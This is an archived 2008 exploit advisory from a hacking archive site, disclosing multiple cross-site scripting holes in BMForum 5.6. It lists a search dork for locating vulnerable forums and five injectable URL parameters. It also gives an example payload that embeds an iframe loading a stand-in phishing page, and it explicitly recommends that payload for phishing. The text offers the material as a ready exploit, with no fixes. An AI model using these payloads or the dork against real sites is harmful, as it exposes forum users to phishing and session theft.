AOH :: HP Unsorted B :: BX3281.HTM

BMForum Remote 5.6 Miltiple XSS Vulnerability



BMForum Remote 5.6 Miltiple XSS Vulnerability
BMForum Remote 5.6 Miltiple XSS Vulnerability



==========================================================
      BMForum Remote 5.6 Miltiple XSS Vulnerability
==========================================================


AUTHOR : CWH Underground
DATE   : 22 May 2008
SITE : www.citec.us


#####################################################
 APPLICATION : BMForum
 VERSION     : 5.6 (Lastest Version)
VENDOR : http://downloads.sourceforge.net/bmforum
#####################################################

DORK: "powered by BMForum"

---Exploit---

[-] http://[target]/[BBForum_path]/index.php?outpused=
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=

--- Note ---
 Very Dangerous for using 'IFRAME' TAG for Phishing Techniques

Example: http://[target]/[BBForum_path]/index.php?outpused= src=http://phisherpage.com width="900" height="600">
                                                                                                                                .

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################
 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.